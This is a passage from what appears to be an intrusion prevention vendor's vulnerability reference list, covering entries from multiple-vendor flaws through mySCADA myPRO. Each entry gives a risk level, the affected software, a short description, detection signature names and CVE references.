https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0411
BID-10358
http://www.securityfocus.com/bid/10358
OSVDB-6107
http://www.osvdb.org/6107
Back to top

Multiple-DVR-Manufacturers-Configuration-Disclosure

About this vulnerability: A Multiple DVR Manufacturers Configuration Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Insecure Configuration
Description: An insecure configuration vulnerability in multiple DVR manufacturers systems which allows remote attackers to retrieve device configuration information.
Situation: HTTP_CSU-Multiple-DVR-Manufacturers-Configuration-Disclosure
References:
CVE-2013-1391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1391
BID-57579
http://www.securityfocus.com/bid/57579
Back to top

Multiple-IPMI-Cipher-Zero-Vulnerabilities

About this vulnerability: Multiple IPMI Cipher Zero vulnearbilities
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic IPMI interface
Type: Misconfiguration
Description: Multiple Intelligent Platform Management Interface (IPMI) implementations have flaws related to the usage of "cipher zero". Cipher zero allows an attacker to authenticate to the IPMI interface using an arbitrary password. The only information that the attacker needs is a valid account name, but most vendors ship with a default 'admin' account.
Situation: Generic_UDP-IPMI-Cipher-Zero-Mode
References:
OSVDB-93038
http://www.osvdb.org/93038
OSVDB-93039
http://www.osvdb.org/93039
OSVDB-93040
http://www.osvdb.org/93040
Back to top

Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Mozilla Firefox, Thunderbird and Seamonkey. The vulnerability is due to an error while decoding Ogg Vorbis files. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted Ogg Vorbis file, likely embedded in a webpage. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Binary_Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption
References:
CVE-2012-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0444
BID-51753
http://www.securityfocus.com/bid/51753
OSVDB-78739
http://www.osvdb.org/78739
Back to top

Multiple-Products-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow

About this vulnerability: A vulnerability in XMLSoft Libxml2
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Libxml2
Type: Buffer Overflow
Description: There is a vulnerability in Libxml2, a common library that is used to interpret and generate XML documents. The vulnerability is due to a boundary error in Libxml2, specifically in the way libxml2 handles long XML entity names. The vulnerability allows remote attackers to execute arbitrary code on the vulnerable system in the security context of the logged in user. Remote attackers could exploit this vulnerability by persuading a target user to open a specially crafted XML file. As a result of processing the malicious file a heap-based buffer overflow can be triggered. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. In an attack where code injection is not successful, the affected process terminates abnormally.
Situation: HTTP_SS-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
File-TextId_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
File-Text_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
References:
CVE-2008-3529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
BID-31126
http://www.securityfocus.com/bid/31126
Back to top

Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service

About this vulnerability: A denial of service vulnerability in multiple products
Risk: High
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer; Helix Player
Type: Input Validation
Description: There is a denial of service flaw in multiple programs that handle .au files without detecting a divide-by-zero condition.
Situation: File-Binary_Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service
Back to top

Multiple-Schneider-Electric-Products-Denial-Of-Service

About this vulnerability: A vulnerability in multiple Schneider Electric products allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Schneider Electric
Type: Malfunction
Description: A vulnerability exists in multiple Schneider Electric products where an attacker can send custom TCP packets causing a denial of service condition.
Situation: Generic_CS-Multiple-Schneider-Electric-Products-Denial-Of-Service
Back to top

Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections

About this vulnerability: A vulnerability in SolarWinds IP Address Manager
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: SolarWinds Orion IPAM; SolarWinds NetFlow Traffic Analyzer; SolarWinds Network Configuration Manager; SolarWinds Network Performance Monitor (NPM); SolarWinds Server and Application Monitor; SolarWinds User Device Tracker; SolarWinds VoIP and Network Quality Manager; SolarWinds Web Performance Monitor
Type: SQL Injection
Description: Multiple SQL injection vulnerabilities have been reported in SolarWinds products which use the Orion management system. These vulnerabilities are due to insufficient validation of certain parameters when processed by GetAccounts(). A remote attacker can exploit these vulnerabilities to inject and execute arbitrary SQL code on the affected system.
Situation: HTTP_CRL-Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections
References:
CVE-2014-9566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9566
OSVDB-118746
http://www.osvdb.org/118746
Back to top

Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow

About this vulnerability: A vulnerability in Apple CUPS
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Apple's Common Unix Printing System (CUPS) distributed by multiple vendors. The vulnerability is due to a boundary error in handling of incoming CGI requests and may be exploited by remote attackers to compromise a vulnerable system or cause denial of service.
Situation: HTTP_CRL-Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow
References:
CVE-2008-0047
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
BID-28307
http://www.securityfocus.com/bid/28307
Back to top

Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Solaris 10; Solaris 7; Solaris 8; Solaris 9
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection. A remote attacker can exploit this vulnerability to interrupt services or degrade the network performance of the target system. In order for an attack to be executed there must exist an open TCP connection between a pair of hosts. The attacker then has the option of attacking either one of the two connected hosts. The resulting behaviour needs to be explored from both sides of the connection. Upon receiving the malicious packet from the attacker the vulnerable host will terminate the TCP connection, thereby destroying the socket used to maintain the connection. No announcement will be send to the other host, the connected host. Therefore the connected host will remain unaware that the connection has been terminated. If the connected host was in the listening mode at the time of the attack it may remain in this mode indefinitely. Alternatively, if it tries to communicate with the vulnerable host, it will receive a TCP RST, since the vulnerable host has already closed the connection and destroyed the socket. Note: Systems using Sun Solaris will not abort an established connection upon receiving the spoofed ICMP error messages. The vendor reports that only a connection in a pre-established state can be interrupted and reset.
Situation: ICMP_Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service
References:
CVE-2004-0790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790
BID-13124
http://www.securityfocus.com/bid/13124
MS06-064
http://technet.microsoft.com/security/bulletin/MS06-064
MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019
Back to top

Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 98; Windows ME; Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can reduce the efficiency of the TCP/IP stack of the target system. An remote attacker can exploit this vulnerability to degrade the network performance of the target system.
Situation: ICMP_Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service
References:
CVE-2004-1060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1060
BID-13124
http://www.securityfocus.com/bid/13124
MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019
Back to top

Multiple-Vendor-ICMP-Source-Quench-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 98; Windows ME; Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP Source Quench message can reduce the efficiency of the TCP/IP stack of the target system. A remote attacker can exploit this vulnerability to degrade the network performance of the target system.
Situation: ICMP_Source-Quench-Message
References:
CVE-2004-0791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791
BID-13124
http://www.securityfocus.com/bid/13124
Back to top

Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow

About this vulnerability: A vulnerability in libwpd Project WordPerfect Document Importer/Exporter (libwpd)
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libwpd Project WordPerfect Document Importer/Exporter (libwpd); AbiSource AbiWord
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the open source WordPerfect Document Importer/Exporter (libwpd) library. The flaw is due to improper boundary check when processing crafted WordPerfect documents. An attacker can exploit this vulnerability by persuading a victim to open a specially crafted WordPerfect (WPD) document. Successful exploitation of this vulnerability may lead to arbitrary code execution in the context of the currently logged in user.
Situation: HTTP_SS-Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
File-Binary_Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
References:
CVE-2007-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0002
BID-23006
http://www.securityfocus.com/bid/23006
Back to top

Multiple-Vendor-PDF-Reader-Catlog-Handling

About this vulnerability: A buffer overflow vulnerability in PDF readers from multiple vulnerabilities
Risk: High
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader; Apple Preview
Type: Buffer Overflow
Description: There is a vulnerability in Portable Document Format (PDF) readers from multiple vendors. A crafted PDF with a malicious catalog entry can be used to execute code with the privilege of the current user or cause denial of service.
Situation: HTTP_SS-Multiple-Vendor-PDF-Reader-Catlog-Handling
File-PDF_Multiple-Vendor-PDF-Reader-Catlog-Handling
References:
CVE-2007-0104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
BID-21910
http://www.securityfocus.com/bid/21910
Back to top

Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass

About this vulnerability: A vulnerability in Net-SNMP
Risk: High
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Net-SNMP
Type: Malfunction
Description: There exists an authentication bypass vulnerability in multiple implementations of SNMPv3 protocol. The vulnerability is caused by improperly handling of HMAC in an authentication message. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted SNMPv3 authentication request to gain unauthorized access to the target system.
Situation: SNMP-UDP_Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass
References:
CVE-2008-0960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960
BID-29623
http://www.securityfocus.com/bid/29623
Back to top

Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service

About this vulnerability: A Multiple Vendor TCP Timestamp Option Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A vulnerability in multiple vendor's TCP stack implementations that allow remote attackers to cause a denial of service attack due to insufficient validation of sequence numbers when updating internal timestamp values.
Situation: Generic_CS-Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service
References:
CVE-2005-0356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0356
Back to top

Multiple-Vendors-Agentx-Receive-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Frank Fock AgentX++
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AgentX++
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in multiple products that use the AgentX++ software. The vulnerability is due to a boundary error in AgentX::receive_agentx function. A remote unauthenticated attacker can exploit this vulnerability by sending multiple blocks of data to the target server on port 705/TCP. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server, normally SYSTEM. Code injection that does not result in execution could terminate the application due to memory corruption, and could result in a Denial of Service condition.
Situation: Generic_CS-Agentx-Receive-Stack-Buffer-Overflow
References:
CVE-2010-1318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1318
BID-39564
http://www.securityfocus.com/bid/39564
Back to top

Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow

About this vulnerability: A vulnerability in FreeBSD Project telnetd
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeBSD Project telnetd;OpenBSD Project telnetd;Red Hat telnetd
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in an implementation of the Telnet daemon, telnetd. This vulnerability was originally reported in FreedBSD's implementation of telnetd, although many related implementations are likely affected, as the source (or a parent's source) has been used as the base of many implementations of telnetd. telnetd is not enabled by default in all contexts. The following implementations are known to be affected: FreeBSD, OpenBSD, Kerberos, and various older versions of Red Hat Linux. The vulnerability is due to the copying of an encryption key into a fixed-length buffer without validation of the key's length. An unauthenticated, remote attacker could exploit this vulnerability by sending a crafted packet to telnetd. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the Telnet daemon.
Situation: Telnet_CSCS-Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow
References:
CVE-2011-4862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862
BID-51182
http://www.securityfocus.com/bid/51182
OSVDB-78020
http://www.osvdb.org/78020
Back to top

Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption

About this vulnerability: A vulnerability in HP-UX
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: HP-UX
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability exists in IBM, Hewlett-Packard and Sun Microsystems calendar manager product.
Situation: Generic_UDP-Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption
Generic_UDP-CMSD-Procedure-0x0a
References:
CVE-2010-4435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4435
BID-36615
http://www.securityfocus.com/bid/36615
OSVDB-70569
http://www.osvdb.org/70569
Back to top

Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution

About this vulnerability: A vulnerability in Apple Common UNIX Printing System
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Malfunction
Description: There exists a memory corruption vulnerability in Apple's Common Unix Printing System distributed by multiple vendors.
Situation: HTTP_CS-Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution
References:
CVE-2008-3641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3641
BID-31688
http://www.securityfocus.com/bid/31688
Back to top

Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Platform: Generic
Software: ISC BIND
Type: Resource Starvation
Description: A denial-of-service vulnerability has been reported in multiple implementations of DNS servers including but not limited to ISC BIND, Microsoft Windows DNS servers, and Unbound DNS servers. The vulnerability is caused by insufficiently limiting the number of DNSKEY and RRSIG records in DNS query responses. A remote, unauthenticated attacker could exploit this vulnerability by providing a specially crafted response to the vulnerable server. Successful exploitation could lead to denial-of-service condition.
Situation: DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Possible-Denial-Of-Service
DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service
References:
CVE-2023-50387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50387
Back to top

Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: ISC BIND
Type: Resource Starvation
Description: A denial-of-service vulnerability has been reported in multiple implementations of DNS servers including but not limited to ISC BIND and Unbound DNS servers. The vulnerability is caused by insufficiently limiting the number of NSEC3 and RRSIG records in DNS query responses. A remote, unauthenticated attacker could exploit this vulnerability by providing a specially crafted response to the vulnerable server. Successful exploitation could lead to denial-of-service condition.
Situation: DNS-UDP_Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service
References:
CVE-2023-50868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50868
Back to top

Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Edge, Mozilla Firefox and Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge; Mozilla Firefox; Chrome
Type: Malfunction
Description: There has been reported a vulnerability affecting multiple JavaScript engines. Engines running on Intel, AMD or ARM processors are affected. This vulnerability can be exploited by having a target user visiting a crafted webpage. Successful exploitation could lead in information disclosure.
Situation: File-Text_Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure
References:
CVE-2017-5753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753
Back to top

Multiple-Vendors-Librpc.dll-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in EMC Legato NetWorker
Risk: High
First detected in: sgpkg-ips-291-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in IBM's Informix Dynamic Server and EMC's Legato Networker. The vulnerability is due to insufficient validation of user input during authentication by the RPC protocol parsing library, librpc.dll. the library is used by the Portmapper service (portmap.exe). An attacker can exploit this vulnerability to cause stack based buffer overflow which can lead to arbitrary code execution in the context of the affected service, which is SYSTEM.
Situation: Generic_RPC-Librpc.dll-Stack-Buffer-Overflow
References:
CVE-2009-2754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2754
BID-38472
http://www.securityfocus.com/bid/38472
Back to top

Multiple-Vendors-Libspf2-DNS-Txt-Record-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in SPF Library Project libspf2
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libspf2
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the Sender Policy Framework library (libspf2).
Situation: DNS-UDP_Multiple-Vendors-DNS-Txt-Record-Parsing-Buffer-Overflow
References:
CVE-2008-2469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2469
BID-31881
http://www.securityfocus.com/bid/31881
Back to top

Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service

About this vulnerability: A vulnerability in NTP.org NTP
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Unified Communications Manager; Cisco Systems Unified CallManager
Type: Resource Starvation
Description: There is a denial of service vulnerability in NTP. The vulnerability is due to incorrect handling of mode 7 (MODE_PRIVATE) requests. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted mode 7 request to a target NTP server. A successful attack can lead to a resource exhaustion and, ultimately, a denial of service condition of the affected service on a target system. NTP is a product shipped by multiple vendors.
Situation: NTP_UDP-Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service
References:
CVE-2009-3563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563
BID-37255
http://www.securityfocus.com/bid/37255
Back to top

Mumblehard-Spambot

About this vulnerability: Mumblehard spambot/backdoor
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Mumblehard is an attack campaign that targets Linux and FreeBSD servers. It is used for spreading spam email but possibly also for other purposes.
Situation: HTTP_CSH-Mumblehard-Spambot-Traffic
Back to top

Mutiny-Arbitrary-File-Upload

About this vulnerability: A Mutiny Arbitrary File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mutiny
Type: Directory Traversal
Description: A directory traversal vulnerability in Mutiny, versions before 5.0-1.11, which allows remote attackers to upload and execute arbitrary programs and read arbitrary files via the uploadPath, paths[], and newPath parameters.
Situation: HTTP_CS-Mutiny-Arbitrary-File-Upload
References:
CVE-2013-0136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0136
OSVDB-93444
http://www.osvdb.org/93444
Back to top

Mutiny-Subnetmask-Injection

About this vulnerability: A vulnerability in Mutiny network monitoring appliance
Risk: High
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mutiny
Type: Code Injection
Description: Command injection vulnerability for Mutiny monitoring software. An authenticated user may execute commands as root through improper input sanitation.
Situation: HTTP_CRL-Mutiny-Subnetmask-Injection
References:
CVE-2012-3001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3001
BID-56165
http://www.securityfocus.com/bid/56165
OSVDB-86570
http://www.osvdb.org/86570
Back to top

MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in MW6 Technologies Aztec ActiveX (Aztec.dll)
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MW6 Technologies Aztec ActiveX
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in MW6 Technologies Aztec ActiveX Control. The vulnerability is due to improperly handled user input in the 'Data' parameter. A remote attacker can exploit this vulnerability by crafting a malicious HTML document causing a buffer overflow. Successful exploitation could lead to code execution in the security context of the affected user.
Situation: File-Text_MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow
References:
CVE-2013-6040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6040
OSVDB-102323
http://www.osvdb.org/102323
Back to top

MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in MW6 Technologies Barcode ActiveX
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MW6 Technologies Barcode ActiveX
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in MW6 Technologies Barcode ActiveX control. The vulnerability is a boundary error when processing user input. A remote attacker can exploit this vulnerability by enticing the user to open a crafted HTML file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
File-Text_MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
References:
CVE-2009-0298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0298
BID-33451
http://www.securityfocus.com/bid/33451
Back to top

MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in MW6 Technologies DataMatrix ActiveX (DataMatrix.dll)
Risk: High
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MW6 Technologies DataMatrix ActiveX
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the MW6 Technologies DataMatrix ActiveX Control. The vulnerability is due to improperly handling of the Data property value. A remote attacker can exploit this vulnerability by crafting a malicious HTML document causing a buffer overflow. Successful exploitation could lead to code execution in the security context of the current user.
Situation: File-Text_MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow
References:
CVE-2013-6040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6040
OSVDB-102324
http://www.osvdb.org/102324
Back to top

MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in MW6 Technologies MaxiCode ActiveX (MaxiCode.dll)
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MW6 Technologies MaxiCode ActiveX
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in MW6 Technologies MaxiCode ActiveX Control. The vulnerability is due to improperly handled user input in the 'Data' parameter. A remote attacker can exploit this vulnerability by crafting a malicious HTML document causing a buffer overflow. Successful exploitation could lead to code execution in the security context of the affected user.
Situation: File-Text_MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow
References:
CVE-2013-6040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6040
OSVDB-102323
http://www.osvdb.org/102323
Back to top

MyBB-Admin-Control-Panel-Code-Injection

About this vulnerability: A vulnerability in MyBB Group MyBB
Risk: Moderate
First detected in: sgpkg-ips-1452-5242
Last changed: sgpkg-ips-1452-5242
Platform: Generic
Software: MyBB
Type: Input Validation
Description: Insufficient input validation when parsing user input sent to the Admin Control Panel causes a code injection in MyBB Control Panel. A successful exploit allows an attacker to exeute code as the user the vulnerable application runs as.
Situation: HTTP_CRL-MyBB-Admin-Control-Panel-Code-Injection
References:
CVE-2022-24734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24734
Back to top

Mydooma-Backdoor

About this vulnerability: Backdoor left by MyDoom.A worm
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MyDoom
Type: Backdoor
Description: This vulnerability is the backdoor left open by the MyDoom.A worm. It is exploited by worms such as Nachi.B/C, DoomJuice (MyDoom.C) and Vesser as well as script kiddies.
Situation: BD-TCP_Mydoom.a-Backdoor
Back to top

Myloader

About this vulnerability: MyLoader
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: MyLoader is a tool for Botnet administrators to manage and gather data from the infected machines.
Situation: HTTP_CSU-Myloader-Activity
Back to top

mySCADA-myPRO-7-Hardcoded-Credentials

About this vulnerability: A vulnerability in mySCADA myPRO 7
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Generic
Software: mySCADA myPRO
Type: Malfunction
Description: mySCADA myPRO 7 may allow remote attackers to access the FTP server by using hardcoded credentials.
Situation: FTP_CS-mySCADA-myPRO-7-Hardcoded-Credentials
References:
CVE-2018-11311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
Back to top

mySCADA-myPRO-CVE-2023-28384-Command-Injection

About this vulnerability: A vulnerability in mySCADA myPRO
Risk: Moderate
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: mySCADA myPRO
Type: Input Validation
Description: Insufficient sanitization of user data used in commands causes a command injection vulnerability in MySCADA MyPRO. A successful exploit allows an attacker to execute arbitrary commands on the target system with root privileges.
Situation: File-Text_mySCADA-myPRO-CVE-2023-28384-Command-Injection
References:
CVE-2023-28384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28384
Back to top

mySCADA-myPRO-CVE-2023-28400-Command-Injection

About this vulnerability: A vulnerability in mySCADA myPRO
Risk: Moderate
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Generic
Software: mySCADA myPRO
Type: Input Validation
Description: Insufficient sanitization of user-sent data causes a command injection vulnerability in mySCADA myPRO. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-mySCADA-myPRO-CVE-2023-28400-Command-Injection
References:
CVE-2023-28400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28400
Back to top

mySCADA-myPRO-CVE-2023-28716-Command-Injection

About this vulnerability: A vulnerability in mySCADA myPRO
Risk: Moderate
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Platform: Generic
Software: mySCADA myPRO
Type: Input Validation
Description: A command injection vulnerability has been reported in mySCADA myPRO. The vulnerability is due to insufficient sanitization of user data used in commands. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in command execution in the security context of the root/SYSTEM user.
Situation: File-Text_mySCADA-myPRO-CVE-2023-28716-Command-Injection
References:
CVE-2023-28716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28716
Back to top

mySCADA-myPRO-Datafromviewscripts-Command-Injection

About this vulnerability: A vulnerability in mySCADA myPRO
Risk: High
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Generic
Software: mySCADA myPRO
Type: Input Validation
